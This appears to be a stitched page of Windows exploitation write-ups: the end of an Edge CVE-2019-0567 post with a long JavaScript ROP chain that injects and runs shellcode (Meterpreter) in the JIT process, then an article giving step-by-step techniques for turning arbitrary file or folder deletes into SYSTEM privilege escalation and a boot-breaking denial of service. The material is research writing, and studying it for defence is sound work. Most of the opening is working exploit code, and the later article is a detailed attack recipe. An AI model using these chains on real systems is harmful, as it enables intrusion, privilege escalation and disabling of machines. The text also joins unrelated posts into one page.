    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
	next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
    next();

    // WriteProcessMemory() ROP chain (Number 4)
    // Stage 9 -> Write our ROP chain to the remote process, using the JIT handle and the leaked stack via GetThreadContext()

    // SIZE_T nSize (R9)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000100, 0x00000000);             // SIZE_T nSize (0x100) (CONTEXT.Rsp is writable and a "full" stack, so 0x100 is more than enough)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // LPVOID lpBaseAddress (RDX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118-0x08, kernelbaseHigh);      // .data section of kernelbase.dll where CONTEXT.Rsp resides
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret (Pointer to CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26ef31, chakraHigh);      // 0x18026ef31: mov rax, qword [rax] ; ret (get CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x435f21, chakraHigh);      // 0x180435f21: mov rdx, rax ; mov rax, rdx ; add rsp, 0x28 ; ret (RAX and RDX now both have CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // LPCVOID lpBuffer (R8)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropBegin, chakraHigh);      // .data section of chakra.dll where our ROP chain is
    next();

    // HANDLE hProcess (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds the full perms handle to JIT server
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
    next();                                                                     // Recall RAX already has a writable pointer in it  

    // Call KERNELBASE!WriteProcessMemory
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x20)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();
	// SetThreadContext() ROP chain
    // Stage 10 -> Update our remote thread's RIP to return execution into our VirtualProtect ROP chain

    // HANDLE hThread (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // const CONTEXT *lpContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
    next();

    // Call KERNELBASE!SetThreadContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x7aa0, kernelbaseHigh); // KERNELBASE!SetThreadContext address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!SetThreadContext)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!SetThreadContext - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();

    // ResumeThread() ROP chain
    // Stage 11 -> Resume the thread, with RIP now pointing to a return into our ROP chain

    // HANDLE hThread (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // Call KERNELBASE!ResumeThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x70a50, kernelbaseHigh); // KERNELBASE!ResumeThread address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!ResumeThread)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!ResumeThread - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
}
</script>

Let’s start by setting a breakpoint on a jmp rax gadget to reach our SetThreadContext call.

The first parameter we will deal with is the handle to the remote thread we have within the JIT process.

This brings our calls to the following states:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	-
);
ResumeThread(
	-
);

The next parameter we will set is the pointer to our updated CONTEXT structure.

We then can get SetThreadContext into RAX and call it. The call should be in the following state:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)		// The updated CONTEXT structure
);

We then can execute our SetThreadContext call and hit our first ResumeThread gadget.

ResumeThread only has one parameter, so we will fill it and set up RAX BUT WE WILL NOT YET EXECUTE THE CALL!

ResumeThread(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
);

Before we execute ResumeThread, we now need to attach another WinDbg instance to the JIT process. We will set a breakpoint on our ret gadget and see if we successfully control the remote thread!

Coming back to the content process, we can hit pt to execute our call to ResumeThread, which should kick off execution of our remote thread within the JIT process!

Going back to the JIT process, we can see our breakpoint was hit and our ROP chain is on the stack! We have gained code execution in the JIT process!

Our last step will be to walk through our VirtualProtect ROP chain, which should mark our shellcode as RWX. Here is how the call should look:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	PAGE_EXECUTE_READWRITE,				// We want our shellcode to be RWX
	addressof(data_address) 			// Any writable address
);

Executing the ret gadget, we hit our first ROP gadgets which setup the lpflOldProtect parameter, which is any address that is writable

We are now here:

VirtualProtect(
	-
	-
	-
	addressof(data_address) 			// Any writable address
);

The next parameter we will address is the lpAddress parameter - which is the address of our shellcode (the page we want to mark as RWX)

We are now here:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	-
	-
	addressof(data_address) 			// Any writable address
);

Next up is dwSize, which we set to 0x1000.

We are now here:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	-
	addressof(data_address) 			// Any writable address
);

The last parameter is our page protection, which is PAGE_EXECUTE_READWRITE.

We are now all setup!

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	PAGE_EXECUTE_READWRITE,				// We want our shellcode to be RWX
	addressof(data_address) 			// Any writable address
);

After executing the function call, we have marked our shellcode as RWX! We have successfully bypassed Arbitrary Code Guard and have generated dynamic RWX memory!

The last thing for us is to ensure execution reaches our shellcode. After executing the VirtualProtect function, let’s see if we hit the last part of our ROP chain - which should push our shellcode address onto the stack, and return into it.

That’s it! We have achieved our task and we now can execute our shellcode!

An exploit GIF shall suit us nicely here!

Meterpreter is also loaded as a reflective, in memory DLL - meaning we have also taken care of CIG as well! That makes for DEP, ASLR, CFG, ACG, CIG, and no-child process mitigation bypasses! No wonder this post was so long!

Conclusion

This was an extremely challenging and rewarding task. Browser exploitation has been a thorn in my side for a long time, and I am very glad I now understand the basics. I do not yet know what is in my future, but if it is close to this level of complexity (I, at least, thought it was complex) I should be in for a treat! It is 4 a.m., so I am signing off now. Here is the final exploit on my GitHub.

Peace, love, and positivity :-)

Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks

What do you do when you’ve found an arbitrary file delete as NT AUTHORITY\SYSTEM? Probably just sigh and call it a DoS. Well, no more. In this article, we’ll show you some great techniques for getting much more out of your arbitrary file deletes, arbitrary folder deletes, and other seemingly low-impact filesystem-based exploit primitives.

The Trouble with Arbitrary File Deletes

When you consider how to leverage an arbitrary file delete on Windows, two great obstacles present themselves:

  1. Most critical Windows OS files are locked down with DACLs that prevent modification even by SYSTEM. Instead, most OS files are owned by TrustedInstaller, and only that account has permission to modify them. (Exercise for the reader: Find the critical Windows OS files that can still be deleted or overwritten by SYSTEM!)
  2. Even if you find a file that you can delete as SYSTEM, it needs to be something that causes a “fail-open” (degradation of security) if deleted.

A third problem that can arise is that some critical system files are inaccessible at all times due to sharing violations.

Experience shows that finding a file to delete that meets all the above criteria is very hard. When looking in the usual places, which would be within C:\Windows, C:\Program Files or C:\Program Data, we’re not aware of anything that fits the bill. There is some prior work that involves exploiting antivirus and other products, but this is dependent on vulnerable behavior in those products.

The Solution is Found Elsewhere: Windows Installer

In March of 2021, we received a vulnerability report from researcher Abdelhamid Naceri (halov). The vulnerability he reported was an arbitrary file delete in the User Profile service, running as SYSTEM. Remarkably, his submission also included a technique to parlay this file delete into an escalation of privilege (EoP), resulting in a command prompt running as SYSTEM. The EoP works by deleting a file, but not in any of the locations you would usually think of.

To understand the route to privilege escalation, we need to explain a bit about the operation of the Windows Installer service. The following explanation is simplified somewhat.

The Windows Installer service is responsible for performing installations of applications. An application author supplies an .msi file, which is a database defining the changes that must be made to install the application: folders to be created, files to be copied, registry keys to be modified, custom actions to be executed, and so forth.

To ensure that system integrity is maintained when an installation cannot be completed, and to make it possible to revert an installation cleanly, the Windows Installer service enforces transactionality. Each time it makes a change to the system, Windows Installer makes a record of the change, and each time it overwrites an existing file on the system with a newer version from the package being installed, it retains a copy of the older version. In case the install needs to be rolled back, these records allow the Windows Installer service to restore the system to its original state. In the simplest scenario, the location for these records is a folder named C:\Config.Msi.

During an installation, the Windows Installer service creates a folder named C:\Config.Msi and populates it with rollback information. Whenever the install process makes a change to the system, Windows Installer records the change in a file of type .rbs (rollback script) within C:\Config.Msi. Additionally, whenever the install overwrites an older version of some file with a newer version, Windows Installer will place a copy of the original file within C:\Config.Msi. This type of a file will be given the .rbf (rollback file) extension. In case an incomplete install needs to be rolled back, the service will read the .rbs and .rbf files and use them to revert the system to the state that existed before the install.

This mechanism must be protected against tampering. If a malicious user were able to alter the .rbs and/or .rbf files before they are read, arbitrary changes to the state of the system could occur during rollback. Therefore, Windows Installer sets a strong DACL on C:\Config.Msi and the enclosed files.

Here is where an opening arises, though: What if an attacker has an arbitrary folder delete vulnerability? They can use it to completely remove C:\Config.Msi immediately after Windows Installer creates it. The attacker can then recreate C:\Config.Msi with a weak DACL (note that ordinary users are allowed to create folders at the root of C:\). Once Windows Installer creates its rollback files within C:\Config.Msi, the attacker will be able to replace C:\Config.Msi with a fraudulent version that contains attacker-specified .rbs and .rbf files. Then, upon rollback, Windows Installer will make arbitrary changes to the system, as specified in the malicious rollback scripts.

Note that the only required exploit primitive here is the ability to delete an empty folder. Moving or renaming the folder works equally well.

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

In conjunction with this article, we are releasing source code for Abdelhamid Naceri’s privilege escalation technique. This exploit has wide applicability in cases where you have a primitive for deleting, moving, or renaming an arbitrary empty folder in the context of SYSTEM or an administrator. The exploit should be built in the Release configuration for either x64 or x86 to match the architecture of the target system. Upon running the exploit, it will prompt you to initiate a delete of C:\Config.Msi. You can do this by triggering an arbitrary folder delete vulnerability, or, for testing purposes, you can simply run rmdir C:\Config.Msi from an elevated command prompt. Upon a successful run, the exploit will drop a file to C:\Program Files\Common Files\microsoft shared\ink\HID.DLL. You can then get a SYSTEM command prompt by starting the On-Screen Keyboard osk.exe and then switching to the Secure Desktop, for example by pressing Ctrl-Alt-Delete.

The exploit contains an .msi file. The main thing that’s special about this .msi is that it contains two custom actions: one that produces a short delay, and a second that throws an error. When the Windows Installer service tries to install this .msi, the installation will halt midway and rollback. By the time the rollback begins, the exploit will have replaced the contents of C:\Config.Msi with a malicious .rbs and .rbf. The .rbf contains the bits of the malicious HID.DLL, and the .rbs instructs Windows Installer to “restore” it to our desired location (C:\Program Files\Common Files\microsoft shared\ink\).

The full mechanism of the EoP exploit is as follows:

  1. The EoP creates a dummy C:\Config.Msi and sets an oplock.
  2. The attacker triggers the folder delete vulnerability to delete C:\Config.Msi (or move C:\Config.Msi elsewhere) in the context of SYSTEM (or admin). Due to the oplock, the SYSTEM process is forced to wait.
  3. Within the EoP, the oplock callback is invoked. The following several steps take place within the callback.
  4. The EoP moves the dummy C:\Config.Msi elsewhere. This is done so that the oplock remains in place and the vulnerable process is forced to continue waiting, while the filesystem location C:\Config.Msi becomes available for other purposes (see further).
  5. The EoP spawns a new thread that invokes the Windows Installer service to install the .msi, with UI disabled.
  6. The callback thread of the EoP continues and begins polling for the existence of C:\Config.Msi. For reasons that are not clear to me, Windows Installer will create C:\Config.Msi, use it briefly for a temp file, delete it, and then create it a second time to use for rollback scripts. The callback thread polls C:\Config.Msi to wait for each of these actions to take place.
  7. As soon as the EoP detects that Windows Installer has created C:\Config.Msi for the second time, the callback thread exits, releasing the oplock. This allows the vulnerable process to proceed and delete (or move, or rename) the C:\Config.Msi created by Windows Installer.
  8. The EoP main thread resumes. It repeatedly attempts to create C:\Config.Msi with a weak DACL. As soon as the vulnerable process deletes (or moves, or renames) C:\Config.Msi, the EoP’s create operation succeeds.
  9. The EoP watches the contents of C:\Config.Msi and waits for Windows Installer to create an .rbs file there.
  10. The EoP repeatedly attempts to move C:\Config.Msi elsewhere. As soon as Windows Installer closes its handle to the .rbs, the move succeeds, and the EoP proceeds.
  11. The EoP creates C:\Config.Msi one final time. Within it, it places a malicious .rbs file having the same name as the original .rbs. Together with the .rbs, it writes a malicious .rbf.
  12. After the delay and the error action specified in the .msi, Windows Installer performs a rollback. It consumes the malicious .rbs and .rbf, dropping the DLL.

Note that at step 7, there is a race condition that sometimes causes problems. If the vulnerable process does not immediately awaken and delete C:\Config.Msi, the window of opportunity may be lost because Windows Installer will soon open a handle to C:\Config.Msi and begin writing an .rbs there. At that point, deleting C:\Config.Msi will no longer work, because it is not an empty folder. To avoid this, it is recommended to run the EoP on a system with a minimum of 4 processor cores. A quiet system, where not much other activity is taking place, is probably ideal. If you do experience a failure, it will be necessary to retry the EoP and trigger the vulnerability a second time.

From Arbitrary File Delete to SYSTEM EoP

The technique described above assumes a primitive that deletes an arbitrary empty folder. Often, though, one has a file delete primitive as opposed to a folder delete primitive. That was the case with Abdelhamid Naceri’s User Profile bug. To achieve SYSTEM EoP in this case, his exploit used one additional trick, which we will now explain.

In NTFS, the metadata (index data) associated with a folder is stored in an alternate data stream on that folder. If the folder is named C:\MyFolder, then the index data is found in a stream referred to as C:\MyFolder::$INDEX_ALLOCATION. Some implementation details can be found here. For our purposes, though, what we need to know is this: deleting the ::$INDEX_ALLOCATION stream of a folder effectively deletes the folder from the filesystem, and a stream name, such as C:\MyFolder::$INDEX_ALLOCATION, can be passed to APIs that expect the name of a file, including DeleteFileW.

So, if you are able to get a process running as SYSTEM or admin to pass an arbitrary string to DeleteFileW, then you can use it not only as a file delete primitive but also as a folder delete primitive. From there, you can get a SYSTEM EoP using the exploit technique discussed above. In our case, the string you want to pass is C:\Config.Msi::$INDEX_ALLOCATION.

Be advised that success depends on the particular code present in the vulnerable process. If the vulnerable process simply calls DeleteFileA/DeleteFileW, you should be fine. In other cases, though, the privileged process performs other associated actions, such as checking the attributes of the specified file. This is why you cannot test this scenario from the command prompt by running del C:\Config.Msi::$INDEX_ALLOCATION.

From Folder Contents Delete to SYSTEM EoP

Leveling up once more, let us suppose that the vulnerable SYSTEM process does not allow us to specify an arbitrary folder or file to be deleted, but we can get it to delete the contents of an arbitrary folder, or alternatively, to recursively delete files from an attacker-writable folder. Can this also be used for EoP? Researcher Abdelhamid Naceri demonstrated this as well, in a subsequent submission in July 2021. In this submission he detailed a vulnerability in the SilentCleanup scheduled task, running as SYSTEM. This task iterates over the contents of a temp folder and deletes each file it finds there. His technique was as follows:

  1. Create a subfolder, temp\folder1.
  2. Create a file, temp\folder1\file1.txt.
  3. Set an oplock on temp\folder1\file1.txt.
  4. Wait for the vulnerable process to enumerate the contents of temp\folder1 and try to delete the file file1.txt it finds there. This will trigger the oplock.
  5. When the oplock triggers, perform the following in the callback:
    a. Move file1.txt elsewhere, so that temp\folder1 is empty and can be deleted. We move file1.txt as opposed to just deleting it because deleting it would require us to first release the oplock. This way, we maintain the oplock so that the vulnerable process continues to wait, while we perform the next step.
    b. Recreate temp\folder1 as a junction to the ‘\RPC Controlfolder of the object namespace. c. Create a symlink at\RPC Control\file1.txtpointing toC:\Config.Msi::$INDEX_ALLOCATION`.
  6. When the callback completes, the oplock is released and the vulnerable process continues execution. The delete of file1.txt becomes a delete of C:\Config.Msi.

Readers may recognize the symlink technique involving \RPC Control from James Forshaw’s symboliclink-testing-tools. Note, though, that it’s not sufficient to set up the junction from temp\folder1 to \RPC Control and then let the arbitrary file delete vulnerability do its thing. That’s because \RPC Control is not an enumerable file system location, so the vulnerable process would not be able to find \RPC Control\file1.txt via enumeration. Instead, we must start off by creating temp\folder1\file1.txt as a bona fide file, allowing the vulnerable process to find it through enumeration. Only afterward, just as the vulnerable process attempts to open the file for deletion, we turn temp\folder1 into a junction pointing into the object namespace.

For working exploit code, see project FolderContentsDeleteToFolderDelete. Note that the built-in malware detection in Windows will flag this process and shut it down. I recommend adding a “Process” exclusion for FolderContentsDeleteToFolderDelete.exe.

You can chain these two exploits together. To begin, run FolderOrFileDeleteToSystem and wait for it to prompt you to trigger privileged deletion of Config.Msi. Then, run FolderContentsDeleteToFolderDelete /target C:\Config.Msi. It will prompt you to trigger privileged deletion of the contents of C:\test1. If necessary for your exploit primitive, you can customize this location using the /initial command-line switch. For testing purposes, you can simulate the privileged folder contents deletion primitive by running del /q C:\test1\* from an elevated command prompt. FolderContentsDeleteToFolderDelete will turn this into a delete of C:\Config.Msi, and this will enable FolderOrFileDeleteToSystem to drop the HID.DLL. Finally, open the On-Screen Keyboard and hit Ctrl-Alt-Delete for your SYSTEM shell.

From Arbitrary Folder Create to Permanent DoS

Before closing, we’d like to share one more technique we learned from this same researcher. Suppose you have an exploit primitive for creating an arbitrary folder as SYSTEM or admin. Unless the folder is created with a weak DACL, it doesn’t sound like this would be something that could have any security impact at all. Surprisingly, though, it does: it can be used for a powerful denial of service. The trick is to create a folder such as this one:

      C:\Windows\System32\cng.sys

Normally there is no file or folder by that name. If an attacker name squats on that filesystem location with an extraneous file or even an empty folder, the Windows boot process is disrupted. The exact mechanism is a bit of a mystery. It would appear that Windows attempts to load the cng.sys kernel module from the improper location and fails, and there is no retry logic that allows it to continue and locate the proper driver. The result is a complete inability to boot the system. Other drivers can be used as well for the same effect.

Depending on the vulnerability at hand, this DoS exploit could even be a remote DoS, as nothing is required besides the ability to drop a single folder or file.

Conclusion

The techniques we’ve presented here show how some rather weak exploit primitives can be used for great effect. We have learned that:

• An arbitrary folder delete/move/rename (even of an empty folder), as SYSTEM or admin, can be used to escalate to SYSTEM.
• An arbitrary file delete, as SYSTEM or admin, can usually be used to escalate to SYSTEM.
• A delete of contents of an arbitrary folder, as SYSTEM or admin, can be used to escalate to SYSTEM.
• A recursive delete, as SYSTEM or admin, of contents of a fixed but attacker-writable folder (such as a temp folder), can be used to escalate to SYSTEM.
• An arbitrary folder create, as SYSTEM or admin, can be used for a permanent system denial-of-service.
• An arbitrary file delete or overwrite, as SYSTEM or admin, even if there is no control of contents, can be used for a permanent system denial-of-service.

We would like to thank researcher Abdelhamid Naceri for his great work in developing these exploit techniques, as well as for the vulnerabilities he has been reporting to our program. We look forward to seeing more from him in the future. Until then, you can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.

Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 2)

Introduction

